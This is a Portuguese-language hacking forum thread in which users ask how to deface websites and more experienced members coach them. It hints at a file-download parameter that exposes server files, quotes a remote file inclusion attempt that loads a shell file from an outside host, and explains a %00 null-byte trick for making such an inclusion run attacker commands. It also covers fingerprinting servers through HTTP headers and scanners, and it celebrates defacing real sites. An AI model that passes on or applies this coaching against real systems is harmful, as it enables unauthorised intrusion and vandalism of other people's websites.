[Dúvida]Sobre Defacement..

[branco]

hehe quem quer ser um deface e ter mais conhecimento doque os publicos sobre vulnerabilidades deve estudar pra conseguir acesso à foruns privados ou entrar em grupos que se dedicam mesmo...
existem tecnicas faceis que poucas pessoas conhecem e que podem fazer estragos "gigantescos" maior que um simples deface.

se realmente quer se dedicar estude bastante, em breve o Dharma vai criar um forum privado e quem sabe você seja convidado phoenix =]

hehe boa sorte,

até mais

[Anonymous]

ahn???  ???

/upload/force_download.php?file=(ARQUIVO) .

(ARQUIVO) seria oque???

[HadeS]

¬¬

Um arquivo no servidor... lol. -.-

HadeS

[Anonymous]

@branco

eu??  :D

[Anonymous]

como o SegmentationFault ownaram os sites?
http://www.zone-h.com.br/component/opti ... tionFault/
os sites estão em .html;
dá pra ownar em .html?? Oo''''''''''''''
como? =D

[Anonymous]

Amigo "BackOff" estou adorando sua participação no Forum, pois esta fazendo perguntas super interessantes, nunca tive esta pergunta em mente, e agora estou super interessado para saber a resposta...

[branco]

hehe a resposta é simples

um servidor é composto não só apenas de paginas mas tambem de softwares como por exemplo um banco de dados mysql, um servidor apache, ssh ou telnet e ftp, entre outros
todos esses podem ter vulnerabilidades, inclusive o sistema operacional do servidor.

t+

[Anonymous]

Desculpa me intrometer..
mas BackOff..pq vc não estuda?estude sobre MySQL,PHP,ASP,HTML..
Busce saber como tudo isso funciona!  ::)
e ainda vc ganha mais conheçimento,e quem sabe vc pode virar o melhor defacer da face da terra!  ;)

[rog]

a extensao do arquivo nao hospedado nao e obrigatoriamente a que aparece na bara de endereço

existe um modulo apache orientado SEO (search engine optimization) chamado mod_rewrite

o uso dele e de traduzir um url por um outro

conforme as regras que se colocar num .htaccess da para ter as paginas em php no servidor e fazer elas parecer .asp na url

[Anonymous]

bem lembrado rog

ex:
http://site.com/cgi-bin/loja.cgi?cmd=pr ... uto=carros

aí aplica o MOD_REWRITE

e fica http://site.com/loja/veiculos/carros  ;)

se quiser mais informações sobre o mod_rewrite,
acesse -> http://www.mod-rewrite-wizard.com/

[Anonymous]

Ta,mais tipo,como saber se tem o apache instalado ow não??
como saber qual o sistema operacional do server???

[Anonymous]

Sim e possivel, e também e possivel ver qual a versão que esta rodando o Apache e do Sistema Operacional.

Existem programas que fazem isto, o pessoal ai do "Defacer" devem postar ai e explicar pra você, ou até mesmo tem no Forum.

[Anonymous]

¬¬ '

já ouviu falar de scanner??
Acunetix 4
baixa ele,ele mostra todas as paginas,o server,o car**** a 4 

ow procura no google as receitinhas de bolo que vc tanto ama; ¬¬

Phoeniix;

[lcs]

Scaner´s por exemplo  o n-map, fallowww

[Wuefez]

Um grande AFF para todos vocês, o problema é que antes de vir aqui perguntar, vocês não estão raciocinando ou até mesmo fazendo uma pequena pesquisa.

Phoeniix:

Warning: main(include/http://nershess.orgfree.com/darkers.txt.php): failed to open stream: No
such file or directory in /home/sct/www/v3/index.php on line 323

Isso por que o script tenta procurar o seu http://nershess.orgfree.com/darkers.txt dentro da pasta include/, isso é uma coisa inteligente a se fazer e ainda no fim ele adiciona um .php.

Vou dar uma palinha pra vocês, muitas vezes esse erro aparece por que ele pois um .php no fim, o que você tem que fazer é por um null byte, na forma de %00 no fim da string pra quando isso passar pelo processador o server ignorar o .php e processar sua cmd de forma normal.

como o SegmentationFault ownaram os sites?
http://www.zone-h.com.br/component/opti ... tionFault/
os sites estão em .html;
dá pra ownar em .html?? Oo''''''''''''''
como? =D

Cara..........
Você acha que explorando scripts é a unica maneira de fazer um defacement?
E se eles usaram por exemplo, algo nada ve tipo uma vulnerabilidade remota no servidor de email utilizado pelos caras pra fazer uma escalação de privilegios e com isso sair ownando os sites da boxe?

PHP Injection = Bug Podre - Fato

Sobre mod_rewrite, não sei se é uma grande improvação a segurança de um webserver instalar ela ja que ja foram encontradas vulnerabilidades ate remotas nela em varias versões, e uma que permite ate tomar as permissoes do usuario que iniciou o apache (99% das vezes usuario root).

Acunetix? kkkkkkkkkkkkkkkkkkk
Você acha que um teste do acunetix vai te dar alguma vulnerabilidade util?
Se não todos os defacers, raquers, sks e inclusive eu teriam o acunetix em suas ferramentas.
Pra mim acunectix é apenas uma jogada de marketing que não funcionou.

Ta,mais tipo,como saber se tem o apache instalado ow não??
como saber qual o sistema operacional do server???

E sobre como descobrir o sistema operacional e webserver que o servidor esta rodando (exemplo: Slackware Linux, Apache 1.3.33 / Php 4.4.42), se alguem aqui parasse pra saber um pouco sobre o protocolo HTTP saberia que quando uma conexão é travada essa informação é passada no cabeçalho do primeiro packet.

Ou seja basta sniffar a sua conexão e entrar no site aonde você deseja puxar as informações do server.

Recomendo que não perguntem o que não for altamente relevante.